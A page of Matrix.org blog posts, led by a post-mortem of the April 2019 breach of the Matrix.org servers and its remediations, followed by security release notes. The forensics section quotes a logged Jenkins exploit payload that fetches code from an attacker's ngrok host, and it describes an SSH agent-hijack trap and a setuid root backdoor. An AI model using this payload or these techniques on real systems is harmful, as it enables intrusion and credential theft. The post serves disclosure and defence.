Matthew Hodgson

160 posts tagged with "Matthew Hodgson" (See all Author)

Post-mortem and remediations for Apr 11 security incident

08.05.2019 00:00 — General Matthew Hodgson

Table of contents

Introduction

Hi all,

On April 11th we dealt with a major security incident impacting the infrastructure which runs the Matrix.org homeserver - specifically: removing an attacker who had gained superuser access to much of our production network. We provided updates at the time as events unfolded on April 11 and 12 via Twitter and our blog, but in this post we’ll try to give a full analysis of what happened and, critically, what we have done to avoid this happening again in future. Apologies that this has taken several weeks to put together: the time-consuming process of rebuilding after the breach has had to take priority, and we also wanted to get the key remediation work in place before writing up the post-mortem.

Firstly, please understand that this incident was not due to issues in the Matrix protocol itself or the wider Matrix network - and indeed everyone who wasn’t on the Matrix.org server should have barely noticed. If you see someone say “Matrix got hacked”, please politely but firmly explain to them that the servers which run the oldest and biggest instance got compromised via a Jenkins vulnerability and bad ops practices, but the protocol and network itself was not impacted. This is not to say that the Matrix protocol itself is bug free - indeed we are still in the process of exiting beta (delayed by this incident), but this incident was not related to the protocol.

Before we get stuck in, we would like to apologise unreservedly to everyone impacted by this whole incident. Matrix is an altruistic open source project, and our mission is to try to make the world a better place by providing a secure decentralised communication protocol and network for the benefit of everyone; giving users total control back over how they communicate online.

In this instance, our focus on trying to improve the protocol and network came at the expense of investing sysadmin time around the legacy Matrix.org homeserver and project infrastructure which we provide as a free public service to help bootstrap the Matrix ecosystem, and we paid the price.

This post will hopefully illustrate that we have learnt our lessons from this incident and will not be repeating them - and indeed intend to come out of this episode stronger than you can possibly imagine :)

Meanwhile, if you think that the world needs Matrix, please consider supporting us via Patreon or Liberapay. Not only will this make it easier for us to invest in our infrastructure in future, it also makes projects like Pantalaimon (E2EE compatibility for all Matrix clients/bots) possible, which are effectively being financed entirely by donations. The funding we raised in Jan 2018 is not going to last forever, and we are currently looking into new longer-term funding approaches - for which we need your support.

Finally, if you happen across security issues in Matrix or matrix.org’s infrastructure, please please consider disclosing them responsibly to us as per our Security Disclosure Policy, in order to help us improve our security while protecting our users.

History

Firstly, some context about Matrix.org’s infrastructure. The public Matrix.org homeserver and its associated services runs across roughly 30 hosts, spanning the actual homeserver, its DBs, load balancers, intranet services, website, bridges, bots, integrations, video conferencing, CI, etc. We provide it as a free public service to the Matrix ecosystem to help bootstrap the network and make life easier for first-time users.

The deployment which was compromised in this incident was mainly set up back in Aug 2017 when we vacated our previous datacenter at short notice, thanks to our funding situation at the time. Previously we had been piggybacking on the well-managed production datacenters of our previous employer, but during the exodus we needed to move as rapidly as possible, and so we span up a bunch of vanilla Debian boxes on UpCloud, and shifted over services as simply as we could. We had no dedicated ops people on the project at that point, so this was a subset of the Synapse and Riot/Web dev teams putting on ops hats to rapidly get set up, whilst also juggling the daily fun of keeping the ever-growing Matrix.org server running and trying to actually develop and improve Matrix itself.

In practice, this meant that some corners were cut that we expected to be able to come back to and address once we had dedicated ops staff on the team. For instance, we skipped setting up a VPN for accessing production in favour of simply SSHing into the servers over the internet. We also went for the simplest possible config management system: checking all the configs for the services into a private git repo. We also didn’t spend much time hardening the default Debian installations - for instance, the default image allows root access via SSH and allows SSH agent forwarding, and the config wasn’t tweaked. This is particularly unfortunate, given our previous production OS (a customised Debian variant) had got all these things right - but the attitude was that because we’d got this right in the past, we’d be easily able to get it right in future once we fixed up the hosts with proper configuration management etc.

Separately, we also made the controversial decision to maintain a public-facing Jenkins instance. We did this deliberately, despite the risks associated with running a complicated publicly available service like Jenkins, but reasoned that as a FOSS project, it is imperative that we are transparent and that continuous integration results and artefacts are available and directly visible to all contributors - whether they are part of the core dev team or not. So we put Jenkins on its own host, gave it some macOS build slaves, and resolved to keep an eye open for any security alerts which would require an upgrade.

Lots of stuff then happened over the following months - we secured funding in Jan 2018; the French Government began talking about switching to Matrix around the same time; the pressure of getting Matrix (and Synapse and Riot) out of beta and to a stable 1.0 grew ever stronger; the challenge of handling the ever-increasing traffic on the Matrix.org server soaked up more and more time, and we started to see our first major security incidents (a major DDoS in March 2018, mitigated by shielding behind Cloudflare, and various attacks on the more beta bits of Matrix itself).

Good news was that funding meant that in March 2018 we were able to hire a fulltime ops specialist! By this point, however, we had two new critical projects in play to try to ensure long-term funding for the project via New Vector, the startup formed in 2017 to hire the core team. Firstly, to build out Modular.im as a commercial-grade Matrix SaaS provider, and secondly, to support France in rolling out their massive Matrix deployment as a flagship example how Matrix can be used. And so, for better or worse, the brand new ops team was given a very clear mandate: to largely ignore the legacy datacenter infrastructure, and instead focus exclusively on building entirely new, pro-grade infrastructure for Modular.im and France, with the expectation of eventually migrating Matrix.org itself into Modular when ready (or just turning off the Matrix.org server entirely, once we have account portability).

So we ended up with two production environments; the legacy Matrix.org infra, whose shortcomings continued to linger and fester off the radar, and separately all the new Modular.im hosts, which are almost entirely operationally isolated from the legacy datacenter; whose configuration is managed exclusively by Ansible, and have sensible SSH configs which disallow root login etc. With 20:20 hindsight, the failure to prioritise hardening the legacy infrastructure is quite a good example of the normalisation of deviance - we had gotten too used to the bad practices; all our attention was going elsewhere; and so we simply failed to prioritise getting back to fix them.

The Incident

The first evidence of things going wrong was a tweet from JaikeySarraf, a security researcher who kindly reached out via DM at the end of Apr 9th to warn us that our Jenkins was outdated after stumbling across it via Google. In practice, our Jenkins was running version 2.117 with plugins which had been updated on an adhoc basis, and we had indeed missed the security advisory (partially because most of our CI pipelines had moved to TravisCI, CircleCI and Buildkite), and so on Apr 10th we updated the Jenkins and investigated to see if any vulnerabilities had been exploited.

In this process, we spotted an unrecognised SSH key in /root/.ssh/authorized_keys2 on the Jenkins build server. This was suspicious both due to the key not being in our key DB and the fact the key was stored in the obscure authorized_keys2 file (a legacy location from back when OpenSSH transitioned from SSH1->SSH2). Further inspection showed that 19 hosts in total had the same key present in the same place.

At this point we started doing forensics to understand the scope of the attack and plan the response, as well as taking snapshots of the hosts to protect data in case the attacker realised we were aware and attempted to vandalise or cover their tracks. Findings were:

matrix.org:443 151.34.xxx.xxx - - [13/Mar/2019:18:46:07 +0000] "GET /jenkins/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0A@GrabResolver(name=%27orange.tw%27,%20root=%27http://5f36xxxx.ngrok.io/jenkins/%27)%0A@Grab(group=%27tw.orange%27,%20module=%270x3a%27,%20version=%27000%27)%0Aimport%20Orange; HTTP/1.1" 500 6083 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0"

  • This allowed them to further compromise a Jenkins slave (Flywheel, an old Mac Pro used mainly for continuous integration testing of Riot/iOS and Riot/Android). The attacker put an SSH key on the box, which was unfortunately exposed to the internet via a high-numbered SSH port for ease of admin by remote users, and placed a trap which waited for any user to SSH into the jenkins user, which would then hijack any available forwarded SSH keys to try to add the attacker’s SSH key to root@ on as many other hosts as possible.
  • On Apr 4th at 12:32 GMT, one of the Riot devops team members SSH’d into the Jenkins slave to perform some admin, forwarding their SSH key for convenience for accessing other boxes while doing so. This triggered the trap, and resulted in the majority of the malicious keys being inserted to the remote hosts.
  • From this point on, the attacker proceeded to explore the network, performing targeted exfiltration of data (e.g. our passbolt database, which is thankfully end-to-end encrypted via GPG) seemingly targeting credentials and data for use in onward exploits, and installing backdoors for later use (e.g. a setuid root shell at /usr/share/bsd-mail/shroot).
  • The majority of access to the hosts occurred between Apr 4th and 6th.
  • There was no evidence of large-scale data exfiltration, based on analysing network logs.
  • There was no evidence of Modular.im hosts having been compromised. (Modular’s provisioning system and DB did run on the old infrastructure, but it was not used to tamper with the modular instances themselves).
  • There was no evidence of the identity server databases having been compromised.
  • There was no evidence of tampering in our source code repositories.
  • There was no evidence of tampering of our distributed software packages.
  • Two more hosts were compromised on Apr 5th by similarly hijacking another developer SSH agent as the dev logged into a production server.

By around 2am on Apr 11th we felt that we had sufficient visibility on the attacker’s behaviour to be able to do a first pass at evicting them by locking down SSH, removing their keys, and blocking as much network traffic as we could.

We then started a full rebuild of the datacenter on the morning of Apr 11th, given that the only responsible course of action when an attacker has acquired root is to salt the earth and start over afresh. This meant rotating all secrets; isolating the old hosts entirely (including ones which appeared to not have been compromised, for safety), spinning up entirely new hosts, and redeploying everything from scratch with the fresh secrets. The process was significantly slowed down by colliding with unplanned maintenance and provisioning issues in the datacenter provider and unexpected delays spent waiting to copy data volumes between datacenters, but by 1am on Apr 12th the core matrix.org server was back up, and we had enough of a website up to publish the initial security incident blog post. (This was actually static HTML, faked by editing the generated WordPress content from the old website. We opted not to transition any WordPress deployments to the new infra, in a bid to keep our attack surface as small as possible going forwards).

Given the production database had been accessed, we had no choice but drop all access_tokens for matrix.org, to stop the attacker accessing user accounts, causing a forced logout for all users on the server. We also recommended all users change their passwords, given the salted & hashed (4096 rounds of bcrypt) passwords had likely been exfiltrated.

At about 4am we had enough of the bare necessities back up and running to pause for sleep.

The Defacement

At around 7am, we were woken up to the news that the attacker had managed to replace the matrix.org website with a defacement (as per https://github.com/vector-im/riot-web/issues/9435). It looks like the attacker didn’t think we were being transparent enough in our initial blog post, and wanted to make it very clear that they had access to many hosts, including the production database and had indeed exfiltrated password hashes. Unfortunately it took a few hours for the defacement to get on our radar as our monitoring infrastructure hadn’t yet been fully restored and the normal paging infrastructure wasn’t back up (we now have emergency-emergency-paging for this eventuality).

On inspection, it transpired that the attacker had not compromised the new infrastructure, but had used Cloudflare to repoint the DNS for matrix.org to a defacement site hosted on Github. Now, as part of rotating the secrets which had been compromised via our configuration repositories, we had of course rotated the Cloudflare API key (used to automate changes to our DNS) during the rebuild on Apr 11. When you log into Cloudflare, it looks something like this...

Cloudflare login UI

...where the top account is your personal one, and the bottom one is an admin role account. To rotate the admin API key, we clicked on the admin account to log in as the admin, and then went to the Profile menu, found the API keys and hit the Change API Key button.

Unfortunately, when you do this, it turns out that the API Key it changes is your personal one, rather than the admin one. As a result, in our rush we thought we’d rotated the admin API key, but we hadn’t, thus accidentally enabling the defacement.

To flush out the defacement we logged in directly as the admin user and changed the API key, pointed the DNS back at the right place, and continued on with the rebuild.

The Rebuild

The goal of the rebuild has been to get all the higher priority services back up rapidly - whilst also ensuring that good security practices are in place going forwards. In practice, this meant making some immediate decisions about how to ensure the new infrastructure did not suffer the same issues and fate as the old. Firstly, we ensured the most obvious mistakes that made the breach possible were mitigated:

  • Access via SSH restricted as heavily as possible
  • SSH agent forwarding disabled server-side
  • All configuration to be managed by Ansible, with secrets encrypted in vaults, rather than sitting in a git repo.

Then, whilst reinstating services on the new infra, we opted to review everything being installed for security risks, replacing with securer alternatives if needed, even if it slowed down the rebuild. Particularly, this meant:

  • Jenkins has been replaced by Buildkite
  • Wordpress has been replaced by static generated sites (e.g. Gatsby)
  • cgit has been replaced by gitlab.
  • Entirely new packaging building, signing & distribution infrastructure (more on that later)
  • etc.

Now, while we restored the main synapse (homeserver), sydent (identity server), sygnal (push server), databases, load balancers, intranet and website on Apr 11, it’s important to understand that there were over 100 other services running on the infra - which is why it is taking a while to get full parity with where we were before.

In the interest of transparency (and to try to give a sense of scale of the impact of the breach), here is the public-facing service list we restored, showing priority (1 is top, 4 is bottom) and the % restore status as of May 4th:

Service status

Apologies again that it took longer to get some of these services back up than we’d preferred (and that there are still a few pending). Once we got the top priority ones up, we had no choice but to juggle the remainder alongside remediation work, other security work, and actually working on Matrix(!), whilst ensuring that the services we restored were being restored securely.

Remediations

Once the majority of the P1 and P2 services had been restored, on Apr 24 we held a formal retrospective for the team on the whole incident, which in turn kicked off a full security audit over the entirety of our infrastructure and operational processes.

We’d like to share the resulting remediation plan in as much detail as possible, in order to show the approach we are taking, and in case it helps others avoid repeating the mistakes of our past. Inevitably we’re going to have to skip over some of the items, however - after all, remediations imply that there’s something that could be improved, and for obvious reasons we don’t want to dig into areas where remediation work is still ongoing. We will aim to provide an update on these once ongoing work is complete, however.

We should also acknowledge that after being removed from the infra, the attacker chose to file a set of Github issues on Apr 12 to highlight some of the security issues that had taken advantage of during the breach. Their actions matched the findings from our forensics on Apr 10, and their suggested remediations aligned with our plan.

We’ve split the remediation work into the following domains.

SSH

Some of the biggest issues exposed by the security breach concerned our use of SSH, which we’ll take in turn:

SSH agent forwarding should be disabled.

SSH agent forwarding is a beguilingly convenient mechanism which allows a user to ‘forward’ access to their private SSH keys to a remote server whilst logged in, so they can in turn access other servers via SSH from that server. Typical uses are to make it easy to copy files between remote servers via scp or rsync, or to interact with a SCM system such as Github via SSH from a remote server. Your private SSH keys end up available for use by the server for as long as you are logged into it, letting the server impersonate you.

The common wisdom on this tends to be something like: “Only use agent forwarding when connecting to trusted hosts”. For instance, Github’s guide to using SSH agent forwarding says:

Warning: You may be tempted to use a wildcard like Host * to just apply this setting (ForwardAgent: yes) to all SSH connections. That's not really a good idea, as you'd be sharing your local SSH keys with every server you SSH into. They won't have direct access to the keys, but they will be able to use them as you while the connection is established. You should only add servers you trust and that you intend to use with agent forwarding

As a result, several of the team doing ops work had set Host *.matrix.org ForwardAgent: yes in their ssh client configs, thinking “well, what can we trust if not our own servers?”

This was a massive, massive mistake.

If there is one lesson everyone should learn from this whole mess, it is: SSH agent forwarding is incredibly unsafe, and in general you should never use it. Not only can malicious code running on the server as that user (or root) hijack your credentials, but your credentials can in turn be used to access hosts behind your network perimeter which might otherwise be inaccessible. All it takes is someone to have snuck malicious code on your server waiting for you to log in with a forwarded agent, and boom, even if it was just a one-off ssh -A.

Our remediations for this are:

  • Disable all ssh agent forwarding on the servers.
  • If you need to jump through a box to ssh into another box, use ssh -J $host.
  • This can also be used with rsync via rsync -e "ssh -J $host"
  • If you need to copy files between machines, use rsync rather than scp (OpenSSH 8.0’s release notes explicitly recommends using more modern protocols than scp).
  • If you need to regularly copy stuff from server to another (or use SSH to GitHub to check out something from a private repo), it might be better to have a specific SSH ‘deploy key’ created for this, stored server-side and only able to perform limited actions.
  • If you just need to check out stuff from public git repos, use https rather than git+ssh.
  • Try to educate everyone on the perils of SSH agent forwarding: if our past selves can’t be a good example, they can at least be a horrible warning...

Another approach could be to allow forwarding, but configure your SSH agent to prompt whenever a remote app tries to access your keys. However, not all agents support this (OpenSSH’s does via ssh-add -c, but gnome-keyring for instance doesn’t), and also it might still be possible for a hijacker to race with the valid request to hijack your credentials.

SSH should not be exposed to the general internet

Needless to say, SSH is no longer exposed to the general internet. We are rolling out a VPN as the main access to dev network, and then SSH bastion hosts to be the only access point into production, using SSH keys to restrict access to be as minimal as possible.

SSH keys should give minimal access

Another major problem factor was that individual SSH keys gave very broad access. We have gone through ensuring that SSH keys grant the least privilege required to the users in question. Particularly, root login should not be available over SSH.

A typical scenario where users might end up with unnecessary access to production are developers who simply want to push new code or check its logs. We are mitigating this by switching over to using continuous deployment infrastructure everywhere rather than developers having to actually SSH into production. For instance, the new matrix.org blog is continuously deployed into production by Buildkite from GitHub without anyone needing to SSH anywhere. Similarly, logs should be available to developers from a logserver in real time, without having to SSH into the actual production host. We’ve already been experimenting internally with sentry for this.

Relatedly, we’ve also shifted to requiring multiple SSH keys per user (per device, and for privileged / unprivileged access), to have finer grained granularity over locking down their permissions and revoking them etc. (We had actually already started this process, and while it didn’t help prevent the attack, it did assist with forensics).

Two factor authentication

We are rolling out two-factor authentication for SSH to ensure that even if keys are compromised (e.g. via forwarding hijack), the attacker needs to have also compromised other physical tokens in order to successfully authenticate.

It should be made as hard as possible to add malicious SSH keys

We’ve decided to stop users from being able to directly manage their own SSH keys in production via ~/.ssh/authorized_keys (or ~/.ssh/authorized_keys2 for that matter) - we can see no benefit from letting non-root users set keys.

Instead, keys for all accounts are managed exclusively by Ansible via /etc/ssh/authorized_keys/$account (using sshd’s AuthorizedKeysFile /etc/ssh/authorized_keys/%u directive).

Changes to SSH keys should be carefully monitored

If we’d had sufficient monitoring of the SSH configuration, the breach could have been caught instantly. We are doing this by managing the keys exclusively via Ansible, and also improving our intrusion detection in general.

Similarly, we are working on tracking changes and additions to other credentials (and enforcing their complexity).

SSH config should be hardened, disabling unnecessary options

If we’d gone through reviewing the default sshd config when we set up the datacenter in the first place, we’d have caught several of these failure modes at the outset. We’ve now done so (as per above).

We’d like to recommend that packages of openssh start having secure-by-default configurations, as a number of the old options just don’t need to exist on most newly provisioned machines.

Network architecture

As mentioned in the History section, the legacy network infrastructure effectively grew organically, without really having a core network or a good split between different production environments.

We are addressing this by:

  • Splitting our infrastructure into strictly separated service domains, which are firewalled from each other and can only access each other via their respective ‘front doors’ (e.g. HTTPS APIs exposed at the loadbalancers).
    • Development
    • Intranet
    • Package Build (airgapped; see below for more details)
    • Package Distribution
    • Production, which is in turn split per class of service.
  • Access to these networks will be via VPN + SSH jumpboxes (as per above). Access to the VPN is via per-device certificate + 2FA, and SSH via keys as per above.
  • Switching to an improved internal VPN between hosts within a given network environment (i.e. we don’t trust the datacenter LAN).

We’re also running most services in containers by default going forwards (previously it was a bit of a mix of running unix processes, VMs, and occasional containers), providing an additional level of namespace isolation.

Keeping patched

Needless to say, this particular breach would not have happened had we kept the public-facing Jenkins patched (although there would of course still have been scope for a 0-day attack).

Going forwards, we are establishing a formal regular process for deploying security updates rather than relying on spotting security advisories on an ad hoc basis. We are now also setting up regular vulnerability scans against production so we catch any gaps before attackers do.

Aside from our infrastructure, we’re also extending the process of regularly checking for security updates to also checking for outdated dependencies in our distributed software (Riot, Synapse, etc) too, given the discipline to regularly chase outdated software applies equally to both.

Moving all our machine deployment and configuration into Ansible allows this to be a much simpler task than before.

Intrusion detection

There’s obviously a lot we need to do in terms of spotting future attacks as rapidly as possible. Amongst other strategies, we’re working on real-time log analysis for aberrant behaviour.

Incident management

There is much we have learnt from managing an incident at this scale. The main highlights taken from our internal retrospective are:

  • The need for a single incident manager to coordinate the technical response and coordinate prioritisation and handover between those handling the incident. (We lacked a single incident manager at first, given several of the team started off that week on holiday...)
  • The benefits of gathering all relevant info and checklists onto a canonical set of shared documents rather than being spread across different chatrooms and lost in scrollback.
  • The need to have an existing inventory of services and secrets available for tracking progress and prioritisation
  • The need to have a general incident management checklist for future reference, which folks can familiarise themselves with ahead of time to avoid stuff getting forgotten. The sort of stuff which will go on our checklist in future includes:
    • Remembering to appoint named incident manager, external comms manager & internal comms manager. (They could of course be the same person, but the roles are distinct).
    • Defining a sensible sequence of forensics, mitigations, communication, rotating secrets etc is followed rather than having to work it out on the fly and risk forgetting stuff
    • Remembering to informing the ICO (Information Commissioner Office) of any user data breaches
    • Guidelines on how to balance between forensics and rebuilding (i.e. how long to spend on forensics, if at all, before pulling the plug)
    • Reminders to snapshot systems for forensics & backups
    • Reminder to not redesign infrastructure during a rebuild. There were a few instances where we lost time by seizing the opportunity to try to fix design flaws whilst rebuilding, some of which were avoidable.
    • Making sure that communication isn’t sent prematurely to users (e.g. we posted the blog post asking people to update their passwords before password reset had actually been restored - apologies for that.)

Configuration management

One of the major flaws once the attacker was in our network was that our internal configuration git repo was cloned on most accounts on most servers, containing within it a plethora of unencrypted secrets. Config would then get symlinked from the checkout to wherever the app or OS needed it.

This is bad in terms of leaving unencrypted secrets (database passwords, API keys etc) lying around everywhere, but also in terms of being able to automatically maintain configuration and spot unauthorised configuration changes.

Our solution is to switch all configuration management, from the OS upwards, to Ansible (which we had already established for Modular.im), using Ansible vaults to store the encrypted secrets. It’s unfortunate that we had already done the work for this (and even had been giving talks at Ansible meetups about it!) but had not yet applied it to the legacy infrastructure.

Avoiding temporary measures which last forever

None of this would have happened had we been more disciplined in finishing off the temporary infrastructure from back in 2017. As a general point, we should try and do it right the first time - and failing that, assign responsibility to someone to update it and assign responsibility to someone else to check. In other words, the only way to dig out of temporary measures like this is to project manage the update or it will not happen. This is of course a general point not specific to this incident, but one well worth reiterating.

Secure packaging

One of the most unfortunate mistakes highlighted by the breach is that the signing keys for the Synapse debian repository, Riot debian repository and Riot/Android releases on the Google Play Store had ended up on hosts which were compromised during the attack. This is obviously a massive fail, and is a case of the geo-distributed dev teams prioritising the convenience of a near-automated release process without thinking through the security risks of storing keys on a production server.

Whilst the keys were compromised, none of the packages that we distribute were tampered with. However, the impact on the project has been high - particularly for Riot/Android, as we cannot allow the risk of an attacker using the keys to sign and somehow distribute malicious variants of Riot/Android, and Google provides no means of recovering from a compromised signing key beyond creating a whole new app and starting over. Therefore we have lost all our ratings, reviews and download counts on Riot/Android and started over. (If you want to give the newly released app a fighting chance despite this setback, feel free to give it some stars on the Play Store). We also revoked the compromised Synapse & Riot GPG keys and created new ones (and published new instructions for how to securely set up your Synapse or Riot debian repos).

In terms of remediation, designing a secure build process is surprisingly hard, particularly for a geo-distributed team. What we have landed on is as follows:

  • Developers create a release branch to signify a new release (ensuring dependencies are pinned to known good versions).
  • We then perform all releases from a dedicated isolated release terminal.
    • This is a device which is kept disconnected from the internet, other than when doing a release, and even then it is firewalled to be able to pull data from SCM and push to the package distribution servers, but otherwise entirely isolated from the network.
    • Needless to say, the device is strictly used for nothing other than performing releases.
    • The build environment installation is scripted and installs on a fresh OS image (letting us easily build new release terminals as needed)
    • The signing keys (hardware or software) are kept exclusively on this device.
    • The publishing SSH keys (hardware or software) used to push to the packaging servers are kept exclusively on this device.
    • We physically store the device securely.
    • We ensure someone on the team always has physical access to it in order to do emergency builds.
  • Meanwhile, releases are distributed using dedicated infrastructure, entirely isolated from the rest of production.
    • These live at https://packages.matrix.org and https://packages.riot.im
    • These are minimal machines with nothing but a static web-server.
    • They are accessed only via the dedicated SSH keys stored on the release terminal.
    • These in turn can be mirrored in future to avoid a SPOF (or we could cheat and use Cloudflare’s always online feature, for better or worse).

Alternatives here included:

  • In an ideal world we’d do reproducible builds instead, and sign the build’s hash with a hardware key, but given we don’t have reproducible builds yet this will have to suffice for now.
  • We could delegate building and distribution entirely to a 3rd party setup such as OBS (as per https://github.com/matrix-org/matrix.org/issues/370). However, we have a very wide range of artefacts to build across many different platforms and OSes, so would rather build ourselves if we can.

Dev and CI infrastructure

The main change in our dev and CI infrastructure is to move from Jenkins to Buildkite. The latter has been serving us well for Synapse builds over the last few months, and has now been extended to serve all the main CI pipelines that Jenkins was providing. Buildkite works by orchestrating jobs on a elastic pool of CI workers we host in our own AWS, and so far has done so quite painlessly.

The new pipelines have been set up so that where CI needs to push artefacts to production for continuous deployment (e.g. riot.im/develop), it does so by poking production via HTTPS to trigger production to pull the artefact from CI, rather than pushing the artefact via SSH to production.

Other than CI, our strategy is:

  • Continue using Github for public repositories
  • Use gitlab.matrix.org for private repositories (and stuff which we don’t want to re-export via the US, like Olm)
  • Continue to host docker images on Docker Hub (despite their recent security dramas).

Log minimisation and handling Personally Identifying Information (PII)

Another thing that the breach made painfully clear is that we log too much. While there’s not much evidence of the attacker going spelunking through any Matrix service log files, the fact is that whilst developing Matrix we’ve kept logging on matrix.org relatively verbose to help with debugging. There’s nothing more frustrating than trying to trace through the traffic for a bug only to discover that logging didn’t pick it up.

However, we can still improve our logging and PII-handling substantially:

  • Ensuring that wherever possible, we hash or at least truncate any PII before logging it (access tokens, matrix IDs, 3rd party IDs etc).
  • Minimising log retention to the bare minimum we need to investigate recent issues and abuse
  • Ensuring that PII is stored hashed wherever possible.

Meanwhile, in Matrix itself we already are very mindful of handling PII (c.f. our privacy policies and GDPR work), but there is also more we can do, particularly:

  • Turning on end-to-end encryption by default, so that even if a server is compromised, the attacker cannot get at private message history. Everyone who uses E2EE in Matrix should have felt some relief that even though the server was compromised, their message history was safe: we need to provide that to everyone. This is https://github.com/vector-im/riot-web/issues/6779.
  • We need device audit trails in Matrix, so that even if a compromised server (or malicious server admin) temporarily adds devices to your account, you can see what’s going on. This is https://github.com/matrix-org/synapse/issues/5145
  • We need to empower users to configure history retention in their rooms, so they can limit the amount of history exposed to an attacker. This is https://github.com/matrix-org/matrix-doc/pull/1763
  • We need to provide account portability (aka decentralised accounts) so that even if a server is compromised, the users can seamlessly migrate elsewhere. The first step of this is https://github.com/matrix-org/matrix-doc/pull/1228.

Conclusion

Hopefully this gives a comprehensive overview of what happened in the breach, how we handled it, and what we are doing to protect against this happening in future.

Again, we’d like to apologise for the massive inconvenience this caused to everyone caught in the crossfire. Thank you for your patience and for sticking with the project whilst we restored systems. And while it is very unfortunate that we ended up in this situation, at least we should be coming out of it much stronger, at least in terms of infrastructure security. We’d also like to particularly thank Kade Morton for providing independent review of this post and our remediations, and everyone who reached out with #hugops during the incident (it was literally the only positive thing we had on our radar), and finally thanks to the those of the Matrix team who hauled ass to rebuild the infrastructure, and also those who doubled down meanwhile to keep the rest of the project on track.

On which note, we’re going to go back to building decentralised communication protocols and reference implementations for a bit... Emoji reactions are on the horizon (at last!), as is Message Editing, RiotX/Android and a host of other long-awaited features - not to mention finally releasing Synapse 1.0. So: thanks again for flying Matrix, even during this period of extreme turbulence and, uh, hijack. Things should mainly be back to normal now and for the foreseeable.

Given the new blog doesn't have comments yet, feel free to discuss the post over at HN.

Security updates: Sydent 1.0.3, Synapse 0.99.3.1 and Riot/Android 0.9.0 / 0.8.99 / 0.8.28a

03.05.2019 00:00 — General Matthew Hodgson

Hi all,

Over the last few weeks we’ve ended up getting a lot of attention from the security research community, which has been incredibly useful and massively appreciated in terms of contributions to improve the security of the reference Matrix implementations.

We’ve also set up an official Security Disclosure Policy to explain the process of reporting security issues to us safely via responsible disclosure - including a Hall of Fame to credit those who have done so. (Please mail [email protected] to remind us if we’ve forgotten you!).

Since we published the Hall of Fame yesterday, we’ve already been getting new entries and so we’re doing a set of security releases today to ensure they are mitigated asap. Unfortunately the work around this means that we’re running late in publishing the post mortem of the Apr 11 security incident - we are trying to get that out as soon as we can.

Sydent 1.0.3

Sydent 1.0.3 has three security fixes:

  • Ensure that authentication tokens are generated using a secure random number generator, ensuring they cannot be predicted by an attacker. This is an important fix - please update. Thanks to Enguerran Gillier (@opnsec) for identifying and responsibly disclosing the issue!
  • Mitigate an HTML injection bug where an invalid room_id could result in malicious HTML being injected into validation emails. The fix for this is in the email template itself; you will need to update any customised email templates to be protected. Thanks to Enguerran Gillier (@opnsec) for identifying and responsibly disclosing this issue too!
  • Randomise session_ids to avoid leaking info about the total number of identity validations, and whether a given ID has been validated. Thanks to @fs0c131y for identifying and responsibly disclosing this one.

If you are running Sydent as an identity server, you should update as soon as possible from https://github.com/matrix-org/sydent/releases/v1.0.3. We are not aware of any of these issues having been exploited maliciously in the wild.

Synapse 0.99.3.1

Synapse 0.99.3.1 is a security update for two fixes:

  • Ensure that random IDs in Synapse are generated using a secure random number generator, ensuring they cannot be predicted by an attacker. Thanks to Enguerran Gillier (@opnsec) for identifying and responsibly disclosing this issue!
  • Add 0.0.0.0/32 and ::/128 to the URL preview blacklist configuration, ensuring that an attacker cannot make connections to localhost. Thanks to Enguerran Gillier (@opnsec) for identifying and responsibly disclosing this issue too!

You can update from https://github.com/matrix-org/synapse/releases or similar as normal. We are not aware of any of these issues having been exploited maliciously in the wild.

(Synapse 0.99.3.2 was released shortly afterwards to fix a non-security issue with the Debian packaging)

Riot/Android 0.9.x/0.8.99 (Google Play) and 0.8.28a (F-Droid)

Riot/Android has an important security fix which shipped over the course of the last week in various versions of the app:

  • Remove obsolete and buggy ContentProvider which could allow a malicious local app to compromise account data. Many thanks to Julien Thomas (@julien_thomas) from Protektoid Project for identifying this and responsibly disclosing it!

The fix for this shipped on F-Droid since 0.8.28a, and on the Play Store, the fix is present in both v0.9.0 (the first version of the re-published Riot app) and v0.8.99 (the last version of the old Riot app, which told everyone to reinstall). Other forks of Riot which we’re aware of have also been informed and should be updated.

If you haven’t already updated, please do so now.

Breaking the 100bps barrier with Matrix, meshsim & coap-proxy

12.03.2019 00:00 — In the News Matthew Hodgson

Hi all,

Last month at FOSDEM 2019 we gave a talk about a new experimental ultra-low-bandwidth transport for Matrix which swaps our baseline HTTPS+JSON transport for a custom one built on CoAP+CBOR+Noise+Flate+UDP.  (CoAP is the RPC protocol; CBOR is the encoding; Noise powers the transport layer encryption; Flate compresses everything uses predefined compression maps).

The challenge here was to see if we could demonstrate Matrix working usably over networks running at around 100 bits per second of throughput (where it'd take 2 minutes to send a typical 1500 byte ethernet packet!!) and very high latencies.  You can see the original FOSDEM talk below, or check out the slides here.

Now, it's taken us a little while to find time to tidy up the stuff we demo'd in the talk to be (relatively) suitable for public consumption, but we're happy to finally release the four projects which powered the demo:

In order to get up and running, the meshsim README has all the details.

It's important to understand that this is very much a proof of concept, and shouldn't be used in production yet, and almost certainly has some glaring bugs.  In fact, it currently assumes you are running on a trusted private network rather than the public Matrix network in order to get away with some of the bandwidth optimisations performed - see coap-proxy's Limitations section for details.  Particularly, please note that the encryption is homemade and not audited or fully reviewed or tested yet.  Also, we've released the code for the low-bandwidth transport, but we haven't released the "fan-out routing" implementation for Synapse as it needs a rethink to be applicable to the public Matrix network.  You'll also want to run Riot/Web in low-bandwidth mode if you really wind down the bandwidth (suppressing avatars, read receipts, typing notifs and presence to avoid wasting precious bandwidth).

We also don't have an MSC for the CoAP-based transport yet, mainly due to lack of time whilst wanting to ensure the limitations are addressed first before we propose it as a formal alternative Matrix transport.  (We also first need to define negotiation mechanisms for entirely alternative CS & SS transports!).  However, the quick overview is:

  • JSON is converted directly into CBOR (with a few substitutions made to shrink common patterns down)
  • HTTP is converted directly into CoAP (mapping the verbose API endpoints down to single-byte endpoints)
  • TLS is swapped out for Noise Pipes (XX + IK noise handshakes).  This gives us 1RTT setup (XX) for the first connection to a host, and 0RTT (IK) for all subsequent connections, and provides trust-on-first-use semantics when connecting to a server.  You can see the Noise state machine we maintain in go-coap's noise.go.
  • The CoAP headers are hoisted up above the Noise payload, letting us use them for framing the noise pipes without having duplicated framing headers at the CoAP & Noise layers.  We also frame the Noise handshake packets as CoAP with custom message types (250, 251 and 252).  We might be better off using OSCORE for this, however, rather than hand-wrapping a custom encrypted transport...
